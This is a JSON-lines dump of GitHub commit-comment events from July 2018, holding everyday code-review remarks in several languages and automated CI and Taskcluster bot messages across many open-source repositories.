{"id":"8015123254","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826038,"position":6,"line":5,"path":"src/entry-server.js","commit_id":"14e4f07fa89015d2e416419f8ea4ccde03b4663b","created_at":"2018-07-25T09:01:39Z","updated_at":"2018-07-25T09:01:39Z","author_association":"OWNER","body":"url 来自于 `server.js` 里的 `server.get` \bcallback 的第一个参数 req，即用户在浏览器里访问的路径"}},"created_at":"2018-07-25T09:01:39Z"}
{"id":"8015124158","type":"CommitCommentEvent","actor":{"login":"jeannielynnmoulton"},"repo":{"name":"diffblue/deeptest-utils"},"payload":{"comment":{"id":29826039,"position":176,"line":389,"path":"src/main/java/com/diffblue/deeptestutils/Reflector.java","commit_id":"399bf922f1aead5fa151cec10ba8d158711fc5b5","created_at":"2018-07-25T09:01:49Z","updated_at":"2018-07-25T09:01:49Z","author_association":"NONE","body":"This is deliberately poorly indented for your reviewing pleasure. The fixup commit follows."}},"created_at":"2018-07-25T09:01:49Z"}
{"id":"8015129106","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29826048,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T09:02:43Z","updated_at":"2018-07-25T09:02:43Z","author_association":"NONE","body":"@noobpwnftw  Well, in my zander2 branch I don't save repetition scores into TT at all. See https://github.com/joergoster/Stockfish/commit/b053f3191289865a1f3bd187e1da0ce3ba5fcf87\r\n\r\nMy consideration is simple: when we reach a node we first check for a draw by repetition before we check for a TT cutoff. Why would we accept a draw score from TT in case the repetition check returned false? This also means we don't have to save repetitions because we don't use them anyway.\r\n\r\nThis is a known hack to circumvent some problems, nevertheless it is a hack.\r\nBut it works reasonably well in practice!"}},"created_at":"2018-07-25T09:02:43Z"}
{"id":"8015129148","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29826049,"position":18,"line":79,"path":"lib/route.rb","commit_id":"20eed7d94c2743497a1009d7447a8011cc696381","created_at":"2018-07-25T09:02:44Z","updated_at":"2018-07-25T09:02:44Z","author_association":"NONE","body":"```\r\nreturn true unless smth.nil?\r\nfalse\r\n```\r\n - то тоже плохая штука, потому что двойное отрицание - это плохо. \r\nего приходится в голове проворачивать.\r\n\r\nэто все можно переписать проще используя вот такую штуку\r\n`[1, 2, 3].all?{ |x| x.is_a? Integer }`\r\nметод all? принимает блок и проверяет что каждый элемент в данном случае Integer\r\nпросто и понятно, никаких unless, никаких nil, никаких отрицаний"}},"created_at":"2018-07-25T09:02:44Z"}
{"id":"8015131559","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29826060,"position":null,"line":null,"path":null,"commit_id":"ab1c3190c22c6a55971575fd40149e7ee1877cb2","created_at":"2018-07-25T09:03:10Z","updated_at":"2018-07-25T09:03:10Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1220)"}},"created_at":"2018-07-25T09:03:10Z"}
{"id":"8015134835","type":"CommitCommentEvent","actor":{"login":"alguret"},"repo":{"name":"Viktik/Yii"},"payload":{"comment":{"id":29826072,"position":19,"line":19,"path":"backend/views/posts/_form.php","commit_id":"23e45d54ab56b9afcc38a5be42a10b376eae3d6e","created_at":"2018-07-25T09:03:46Z","updated_at":"2018-07-25T09:03:46Z","author_association":"NONE","body":"textInput? "}},"created_at":"2018-07-25T09:03:46Z"}
{"id":"8015135140","type":"CommitCommentEvent","actor":{"login":"4PERTURE"},"repo":{"name":"4PERTURE/patched_vendor_alice"},"payload":{"comment":{"id":29826073,"position":null,"line":null,"path":null,"commit_id":"baadb360d076a2bd67639439ac1e0d6b184f3aff","created_at":"2018-07-25T09:03:49Z","updated_at":"2018-07-25T09:03:49Z","author_association":"OWNER","body":"1/1 I thought there were more files but I was wrong"}},"created_at":"2018-07-25T09:03:49Z"}
{"id":"8015136872","type":"CommitCommentEvent","actor":{"login":"alguret"},"repo":{"name":"Viktik/Yii"},"payload":{"comment":{"id":29826076,"position":19,"line":19,"path":"backend/views/posts/_form.php","commit_id":"23e45d54ab56b9afcc38a5be42a10b376eae3d6e","created_at":"2018-07-25T09:04:09Z","updated_at":"2018-07-25T09:04:09Z","author_association":"NONE","body":"должен быть селект с именами юзеров."}},"created_at":"2018-07-25T09:04:09Z"}
{"id":"8015142717","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826091,"position":17,"line":25,"path":"server.js","commit_id":"14e4f07fa89015d2e416419f8ea4ccde03b4663b","created_at":"2018-07-25T09:05:14Z","updated_at":"2018-07-25T09:05:14Z","author_association":"OWNER","body":"将`url`传个 `entry-server.js` 文件里的这个工厂函数。"}},"created_at":"2018-07-25T09:05:14Z"}
{"id":"8015154147","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":29826112,"position":7,"line":498,"path":"Lib/fontTools/cffLib/specializer.py","commit_id":"6df5328950ffeffe863dee1305646eb5a776ce60","created_at":"2018-07-25T09:07:19Z","updated_at":"2018-07-25T09:07:19Z","author_association":"MEMBER","body":"You could also simply check that it is < maxstack instead of less than or equal maxstack - 1."}},"created_at":"2018-07-25T09:07:19Z"}
{"id":"8015160159","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29826127,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T09:08:27Z","updated_at":"2018-07-25T09:08:27Z","author_association":"NONE","body":"i'am skeptical that this deserves a [-3,1] test but approved (but if i understand your comment you intend later to do a [0,5]). \r\n\r\nHint:\r\nYou use prio -1. That makes only sense if you want park a test or really want this to run if framework goes empty because while tests with better prio exists for your test no new workers are assigned. Better is to use lower throughput to constrain the used bandwidth for the test (what would be anyway the correct way for this patch as i consider this as a sort of speculative LTC test).\r\n\r\nso i have set prio back to 0 and throughput to 200."}},"created_at":"2018-07-25T09:08:27Z"}
{"id":"8015171167","type":"CommitCommentEvent","actor":{"login":"njleonzhang"},"repo":{"name":"njleonzhang/play-vue-ssr"},"payload":{"comment":{"id":29826143,"position":22,"line":22,"path":"src/router/index.js","commit_id":"14e4f07fa89015d2e416419f8ea4ccde03b4663b","created_at":"2018-07-25T09:10:30Z","updated_at":"2018-07-25T09:10:30Z","author_association":"OWNER","body":" vue-router 的路由描述文件. 和 non-ssr 不一样的地方就在于，ssr 版本工厂化了。 "}},"created_at":"2018-07-25T09:10:30Z"}
{"id":"8015172686","type":"CommitCommentEvent","actor":{"login":"ludwigschwardt"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29826147,"position":null,"line":null,"path":null,"commit_id":"dce09c499db59e3de3e96036f5af6c52bf4249e6","created_at":"2018-07-25T09:10:45Z","updated_at":"2018-07-25T09:10:45Z","author_association":"CONTRIBUTOR","body":"Thanks! Since I don't really know Ruby I had to dig and mindlessly copy and paste quite a bit to discover assertions in the first place. Nice to know more of them!"}},"created_at":"2018-07-25T09:10:45Z"}
{"id":"8015181493","type":"CommitCommentEvent","actor":{"login":"eatyourgreens"},"repo":{"name":"zooniverse/Panoptes-Front-End"},"payload":{"comment":{"id":29826175,"position":5,"line":78,"path":"app/classifier/tasks/text/index.jsx","commit_id":"a8c3c91ebcbcaa558bf93ab9f2f63a7cfca80791","created_at":"2018-07-25T09:12:20Z","updated_at":"2018-07-25T09:12:20Z","author_association":"MEMBER","body":"`handleResize`, not `handleResize()` here. The callback argument is a reference to a function. "}},"created_at":"2018-07-25T09:12:20Z"}
{"id":"8015182630","type":"CommitCommentEvent","actor":{"login":"sunny-wanghaiqing"},"repo":{"name":"sunny-wanghaiqing/test"},"payload":{"comment":{"id":29826178,"position":null,"line":null,"path":null,"commit_id":"b6c7199bb5935dd85a840c40deab01118bb463c6","created_at":"2018-07-25T09:12:32Z","updated_at":"2018-07-25T09:12:32Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-25T09:12:32Z"}
{"id":"8015184193","type":"CommitCommentEvent","actor":{"login":"eatyourgreens"},"repo":{"name":"zooniverse/Panoptes-Front-End"},"payload":{"comment":{"id":29826182,"position":8,"line":80,"path":"app/classifier/tasks/text/index.jsx","commit_id":"a8c3c91ebcbcaa558bf93ab9f2f63a7cfca80791","created_at":"2018-07-25T09:12:48Z","updated_at":"2018-07-25T09:12:48Z","author_association":"MEMBER","body":"`handleResize` here too. "}},"created_at":"2018-07-25T09:12:48Z"}
{"id":"8015186087","type":"CommitCommentEvent","actor":{"login":"vikas0121"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":29826184,"position":null,"line":null,"path":null,"commit_id":"b523eb9d18c223166b923579533be764d2d4b6ae","created_at":"2018-07-25T09:13:09Z","updated_at":"2018-07-25T09:13:09Z","author_association":"NONE","body":"Please help\r\nwhile calling this method process get stuck.\r\n_id = insertUserDoc.call(Accounts, options, user)\r\n\r\ninput:\r\n{ username: 'Guest_3129810000-14:35',\r\ndepartment: 'mt3uAwpz4dSqow7pg',\r\ntype: 'visitor',\r\ncustid: 0,\r\ncountry: undefined,\r\nuserAgent: 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36', ip: '127.0.0.1', host: 'localhost:3000' }"}},"created_at":"2018-07-25T09:13:09Z"}
{"id":"8015187823","type":"CommitCommentEvent","actor":{"login":"wizofoz"},"repo":{"name":"wizofoz/zanella-25luglio-se2"},"payload":{"comment":{"id":29826187,"position":null,"line":null,"path":null,"commit_id":"0dcf1b089c600841b7d2d6894e678725d2d61b37","created_at":"2018-07-25T09:13:27Z","updated_at":"2018-07-25T09:13:27Z","author_association":"OWNER","body":"__API Description file syntax error on line 31__: bad indentation of a mapping entry (Autogenerated message from apiary.io)"}},"created_at":"2018-07-25T09:13:27Z"}
{"id":"8015189948","type":"CommitCommentEvent","actor":{"login":"evilglass"},"repo":{"name":"cuongdq88/bbc"},"payload":{"comment":{"id":29826190,"position":null,"line":null,"path":null,"commit_id":"67345bd9a3ce86ed52d3ee8489bf86cc99082ab0","created_at":"2018-07-25T09:13:50Z","updated_at":"2018-07-25T09:13:50Z","author_association":"NONE","body":"Hi, how can I see the file?\r\nAnd you are so consistent."}},"created_at":"2018-07-25T09:13:50Z"}
{"id":"8015190701","type":"CommitCommentEvent","actor":{"login":"fokkonaut"},"repo":{"name":"ddnet/ddnet"},"payload":{"comment":{"id":29826192,"position":null,"line":null,"path":null,"commit_id":"d08f03fecf16256b7333855edf617f4b9a6d8466","created_at":"2018-07-25T09:13:58Z","updated_at":"2018-07-25T09:13:58Z","author_association":"CONTRIBUTOR","body":"you should add that for vanilla skins only."}},"created_at":"2018-07-25T09:13:58Z"}
{"id":"8015193588","type":"CommitCommentEvent","actor":{"login":"lgoldstein"},"repo":{"name":"gnodet/mina-sshd"},"payload":{"comment":{"id":29826195,"position":45,"line":684,"path":"sshd-core/src/main/java/org/apache/sshd/common/channel/AbstractChannel.java","commit_id":"58f7198c5a32184d6bff6bc08a4317cc4deb2a67","created_at":"2018-07-25T09:14:29Z","updated_at":"2018-07-25T09:14:29Z","author_association":"NONE","body":"Should use `log.isDebugEnabled()` here"}},"created_at":"2018-07-25T09:14:29Z"}
{"id":"8015199170","type":"CommitCommentEvent","actor":{"login":"nestorzamot"},"repo":{"name":"nestorzamot/crossing-guard"},"payload":{"comment":{"id":29826208,"position":null,"line":null,"path":null,"commit_id":"bac8cc2dec34290d8265e6628a5e3f755f0bd8c6","created_at":"2018-07-25T09:15:29Z","updated_at":"2018-07-25T09:15:29Z","author_association":"OWNER","body":"![nestor bitcoin](https://user-images.githubusercontent.com/34361631/43191716-bdfc03a4-8fc9-11e8-9842-d1940e9170da.png)\r\n"}},"created_at":"2018-07-25T09:15:29Z"}
{"id":"8015199748","type":"CommitCommentEvent","actor":{"login":"MaxenceBouvier"},"repo":{"name":"CEA-LIST/N2D2"},"payload":{"comment":{"id":29826210,"position":null,"line":null,"path":null,"commit_id":"9322c73e32a3e52adc704941e2476a8f71668cbe","created_at":"2018-07-25T09:15:35Z","updated_at":"2018-07-25T09:15:35Z","author_association":"NONE","body":"Hi, I think I get a problem there. When I send a transformed from 3D to 2D vector (i.e a RGB image converted in gray-scale), it returns an error saying \"Error: StimuliProvider::readStimulus(): expected data size is 124 37 1 1 , but size after transformations is 142 37 1\".\r\nMy stimulis are loaded and transformed like this:\r\n\r\n``DefaultModel=Frame\r\n\r\n[database]\r\nType=DIR_Database\r\nDataPath=/nobackup/N2D2/data/tracking_kitti/training/image_02\r\nDepth=1\r\nLearn=0.8\r\nValidation=0.2\r\n\r\n[sp]\r\nSizeX=124\r\nSizeY=37\r\nBatchSize=1\r\n\r\n[sp.Transformation1]\r\nType=RescaleTransformation\r\nWidth=142\r\nHeight=37\r\n\r\n[sp.Transformation2]\r\nType=ChannelExtractionTransformation\r\nCSChannel=Gray``"}},"created_at":"2018-07-25T09:15:35Z"}
{"id":"8015208413","type":"CommitCommentEvent","actor":{"login":"eatyourgreens"},"repo":{"name":"zooniverse/Panoptes-Front-End"},"payload":{"comment":{"id":29826224,"position":18,"line":89,"path":"app/classifier/tasks/text/index.jsx","commit_id":"a8c3c91ebcbcaa558bf93ab9f2f63a7cfca80791","created_at":"2018-07-25T09:17:09Z","updated_at":"2018-07-25T09:17:09Z","author_association":"MEMBER","body":"Sorry I meant split this into two lines of code, to avoid the nested function calls. \r\n```javascript\r\nLet newRows=Math.min(…);\r\nnewRows = Math.max(newRows, 1);\r\n```"}},"created_at":"2018-07-25T09:17:09Z"}
{"id":"8015209170","type":"CommitCommentEvent","actor":{"login":"lgoldstein"},"repo":{"name":"gnodet/mina-sshd"},"payload":{"comment":{"id":29826227,"position":82,"line":286,"path":"sshd-core/src/main/java/org/apache/sshd/server/forward/TcpipServerChannel.java","commit_id":"58f7198c5a32184d6bff6bc08a4317cc4deb2a67","created_at":"2018-07-25T09:17:17Z","updated_at":"2018-07-25T09:17:17Z","author_association":"NONE","body":"1.  Is there some way to allow the user to provide us with an executor service and if _null_ then create one ourselves\r\n2. Why `newCachedThreadPool` ?"}},"created_at":"2018-07-25T09:17:17Z"}
{"id":"8015210604","type":"CommitCommentEvent","actor":{"login":"danielhollas"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29826232,"position":null,"line":null,"path":null,"commit_id":"7ab4f76e16e3d3950062ffd6efa4a4b50f7fa5fe","created_at":"2018-07-25T09:17:32Z","updated_at":"2018-07-25T09:17:32Z","author_association":"NONE","body":"Hi there! Sorry for jumping in here, two question:\r\n\r\n1. Does this apply commit apply to unicode chars inside \\text{}? More specifically, I am now interested in rendering armenian scripts, like `\\text{փոխվի}`. This seems to work fine at the [KaTex preview page](https://khan.github.io/KaTeX/), but not at Khan Academy, so..\r\n\r\n2. Is this code live at KA? If so, is the strict mode enabled or disabled?\r\n\r\nThanks! Let me know if I should turn this into an issue..."}},"created_at":"2018-07-25T09:17:32Z"}
{"id":"8015216253","type":"CommitCommentEvent","actor":{"login":"wizofoz"},"repo":{"name":"wizofoz/zanella-25luglio-se2"},"payload":{"comment":{"id":29826241,"position":null,"line":null,"path":null,"commit_id":"3094a780b0a64a52af02f7b02517262484bf4766","created_at":"2018-07-25T09:18:32Z","updated_at":"2018-07-25T09:18:32Z","author_association":"OWNER","body":"__API Description file syntax error on line 33__: bad indentation of a mapping entry (Autogenerated message from apiary.io)"}},"created_at":"2018-07-25T09:18:32Z"}
{"id":"8015216510","type":"CommitCommentEvent","actor":{"login":"ploko"},"repo":{"name":"ploko/collab-github-v2"},"payload":{"comment":{"id":29826244,"position":null,"line":null,"path":null,"commit_id":"9f0f71f7496f8bd4d5343860b434d38dff418db5","created_at":"2018-07-25T09:18:34Z","updated_at":"2018-07-25T09:18:34Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1221)"}},"created_at":"2018-07-25T09:18:34Z"}
{"id":"8015217511","type":"CommitCommentEvent","actor":{"login":"jonnyshaw89"},"repo":{"name":"ONSdigital/eq-schema-validator"},"payload":{"comment":{"id":29826245,"position":null,"line":null,"path":null,"commit_id":"35a7a51022e6bd31467cac721e4dea4ac71fc489","created_at":"2018-07-25T09:18:45Z","updated_at":"2018-07-25T09:18:45Z","author_association":"MEMBER","body":"@samiwel this shouldn't change how the integration works, currently runner required this anyway, so its just enforcing it earlier"}},"created_at":"2018-07-25T09:18:45Z"}
{"id":"8015218728","type":"CommitCommentEvent","actor":{"login":"NetGodFather"},"repo":{"name":"NetGodFather/CoinnessAPI"},"payload":{"comment":{"id":29826247,"position":null,"line":null,"path":null,"commit_id":"8abed59522d3466df7d4196ca9277d015b9dad15","created_at":"2018-07-25T09:18:59Z","updated_at":"2018-07-25T09:18:59Z","author_association":"OWNER","body":"Good"}},"created_at":"2018-07-25T09:18:59Z"}
{"id":"8015219306","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29826250,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T09:19:06Z","updated_at":"2018-07-25T09:19:06Z","author_association":"OWNER","body":"@joergoster Right, not saving/using draws from TT will make the problem go away, but it would also lose some ELO, have you tested it? I think we should find a way to minimize the chances of having those problems while it is at least ELO neutral.\r\n\r\n@locutus2 I see it as a bug fix of a very tricky problem, the problem has been around for a while, but almost every attempt to get rid of it ended up losing ELO. I hope it would pass a [0,5], but I'd be glad if it is just neutral. STC indicated that there might even be a very small gain due to the \"side-effect\" of having a wider search with biased draws, since it almost touches nothing else but the rare cases(where the search got suck in a imaginary TT 3-fold, while in practice the opponent might not follow, kind of a chicken and egg problem). If it passes LTC [-3,1] I will queue a test it on [0,5] to see what happens."}},"created_at":"2018-07-25T09:19:06Z"}
{"id":"8015221252","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29826254,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-25T09:19:27Z","updated_at":"2018-07-25T09:19:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T09:19:27Z"}
{"id":"8015222675","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29826259,"position":null,"line":null,"path":null,"commit_id":"be084e58412bdf2bdbf80b9782ac4314efac7358","created_at":"2018-07-25T09:19:42Z","updated_at":"2018-07-25T09:19:42Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T09:19:42Z"}
{"id":"8015223666","type":"CommitCommentEvent","actor":{"login":"JoschD"},"repo":{"name":"pylhc/Beta-Beat.src"},"payload":{"comment":{"id":29826263,"position":null,"line":null,"path":null,"commit_id":"608ed26f104f346f07be8d3f9b6f8aa995681591","created_at":"2018-07-25T09:19:54Z","updated_at":"2018-07-25T09:19:54Z","author_association":"CONTRIBUTOR","body":"@lmalina is reponsible for this commit as well. Just saying"}},"created_at":"2018-07-25T09:19:54Z"}
{"id":"8015226745","type":"CommitCommentEvent","actor":{"login":"Xudong-Huang"},"repo":{"name":"trustnote/rust-trustnote"},"payload":{"comment":{"id":29826271,"position":null,"line":null,"path":null,"commit_id":"272a75325d45b10243b3613074a7d92a3f9347cf","created_at":"2018-07-25T09:20:28Z","updated_at":"2018-07-25T09:20:28Z","author_association":"CONTRIBUTOR","body":"should be #256 "}},"created_at":"2018-07-25T09:20:28Z"}
{"id":"8015227273","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/pli-extras"},"payload":{"comment":{"id":29826273,"position":null,"line":null,"path":null,"commit_id":"3c665b6199d04243a65282eada89099d0a2f02b3","created_at":"2018-07-25T09:20:35Z","updated_at":"2018-07-25T09:20:35Z","author_association":"MEMBER","body":"We don't use \"OPENPLI_FEATURES\", instead we use \"MACHINE_FEATURES\" so make sure we install needed things ;)"}},"created_at":"2018-07-25T09:20:35Z"}
{"id":"8015232306","type":"CommitCommentEvent","actor":{"login":"SchoolGame"},"repo":{"name":"SchoolGame/Cogi_Lion"},"payload":{"comment":{"id":29826291,"position":1,"line":1,"path":"README.md","commit_id":"d66d7df0c998cd5ccb05446e0ed8a6803792cfc4","created_at":"2018-07-25T09:21:29Z","updated_at":"2018-07-25T09:21:29Z","author_association":"OWNER","body":"코기... 고기먹고싶다\r\n"}},"created_at":"2018-07-25T09:21:29Z"}
{"id":"8015233280","type":"CommitCommentEvent","actor":{"login":"SchoolGame"},"repo":{"name":"SchoolGame/Cogi_Lion"},"payload":{"comment":{"id":29826293,"position":1,"line":1,"path":"README.md","commit_id":"d66d7df0c998cd5ccb05446e0ed8a6803792cfc4","created_at":"2018-07-25T09:21:40Z","updated_at":"2018-07-25T09:21:40Z","author_association":"OWNER","body":"쇼하고있네\r\n"}},"created_at":"2018-07-25T09:21:40Z"}
{"id":"8015237431","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla/release-services"},"payload":{"comment":{"id":29826305,"position":null,"line":null,"path":null,"commit_id":"621d82357b873551656bb7f2819c85500f591d44","created_at":"2018-07-25T09:22:25Z","updated_at":"2018-07-25T09:22:25Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-testing-*\",\n    \"hooks:modify-hook:project-releng/services-testing-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:route:index.project.releng.services.requests.testing.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:testing\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.testing.by-timestamp.1532510545718\",\n    \"queue:route:index.project.releng.services.requests.testing.by-revision.621d82357b873551656bb7f2819c85500f591d44\",\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n        \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/mozilla/release-services:branch:testing\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-testing-*\",\n    \"hooks:modify-hook:project-releng/services-testing-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.testing.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:testing\",\n    \"docker-worker:capability:privileged\",\n    \"queue:route:index.project.releng.services.requests.testing.by-timestamp.1532510545718\",\n    \"queue:route:index.project.releng.services.requests.testing.by-revision.621d82357b873551656bb7f2819c85500f591d44\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:very-high:aws-provisioner-v1/releng-svc\",\n                \"queue:create-task:high:aws-provisioner-v1/releng-svc\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-25T09:22:25.875Z\n\n</details>"}},"created_at":"2018-07-25T09:22:25Z"}
{"id":"8015238976","type":"CommitCommentEvent","actor":{"login":"versat"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29826308,"position":null,"line":null,"path":null,"commit_id":"d300d1f61b2b368a1cba64b6f33b1d0e870d9725","created_at":"2018-07-25T09:22:43Z","updated_at":"2018-07-25T09:22:43Z","author_association":"COLLABORATOR","body":"And this commit breaks all Windows/Visual Studio builds, see appveyor:\r\n```\r\n..\\externals\\simplecpp\\simplecpp.cpp(103): error C2375: 'endsWith' : redefinition; different linkage [C:\\projects\\cppcheck\\lib\\cppcheck.vcxproj]\r\n          c:\\projects\\cppcheck\\lib\\utils.h(34) : see declaration of 'endsWith'\r\n\r\n```"}},"created_at":"2018-07-25T09:22:43Z"}
{"id":"8015276793","type":"CommitCommentEvent","actor":{"login":"wu-sheng"},"repo":{"name":"peng-yongsheng/incubator-skywalking"},"payload":{"comment":{"id":29826388,"position":29,"line":35,"path":"oap-server/server-core/src/main/java/org/apache/skywalking/oap/server/core/analysis/indicator/AvgIndicator.java","commit_id":"6fd8f61e7eaffb84d842472b5929de77538c6c41","created_at":"2018-07-25T09:29:36Z","updated_at":"2018-07-25T09:29:36Z","author_association":"NONE","body":"Add an `@Entrance` annotation to the method? For the generator?"}},"created_at":"2018-07-25T09:29:36Z"}
{"id":"8015279677","type":"CommitCommentEvent","actor":{"login":"wu-sheng"},"repo":{"name":"peng-yongsheng/incubator-skywalking"},"payload":{"comment":{"id":29826396,"position":14,"line":26,"path":"oap-server/server-core/src/main/java/org/apache/skywalking/oap/server/core/analysis/indicator/AvgIndicator.java","commit_id":"6fd8f61e7eaffb84d842472b5929de77538c6c41","created_at":"2018-07-25T09:30:08Z","updated_at":"2018-07-25T09:30:08Z","author_association":"NONE","body":"Consider adding all Indicators into a file or class to let the generator know the existing Indicators?"}},"created_at":"2018-07-25T09:30:08Z"}
{"id":"8015281916","type":"CommitCommentEvent","actor":{"login":"guizmaii"},"repo":{"name":"sderosiaux/every-single-day-i-tldr"},"payload":{"comment":{"id":29826406,"position":null,"line":null,"path":null,"commit_id":"9f620cdb7ad3846c9ad24678bf7a673078667473","created_at":"2018-07-25T09:30:30Z","updated_at":"2018-07-25T09:30:30Z","author_association":"NONE","body":"🎉 "}},"created_at":"2018-07-25T09:30:30Z"}
{"id":"8015282957","type":"CommitCommentEvent","actor":{"login":"AmyLGalles"},"repo":{"name":"AmyLGalles/AirBnB_clone_v2"},"payload":{"comment":{"id":29826407,"position":3,"line":47,"path":"models/engine/db_storage.py","commit_id":"e63e9c6129932d05b17c3215c1e060c44ff7f9b5","created_at":"2018-07-25T09:30:42Z","updated_at":"2018-07-25T09:30:42Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-25T09:30:42Z"}
{"id":"8015283266","type":"CommitCommentEvent","actor":{"login":"oxisto"},"repo":{"name":"oxisto/expenses"},"payload":{"comment":{"id":29826409,"position":null,"line":null,"path":null,"commit_id":"9a100b637d2aed82c44d2f7c4807cb9b7d3f7f38","created_at":"2018-07-25T09:30:45Z","updated_at":"2018-07-25T09:30:45Z","author_association":"OWNER","body":"Should fix #19 and #18 "}},"created_at":"2018-07-25T09:30:45Z"}
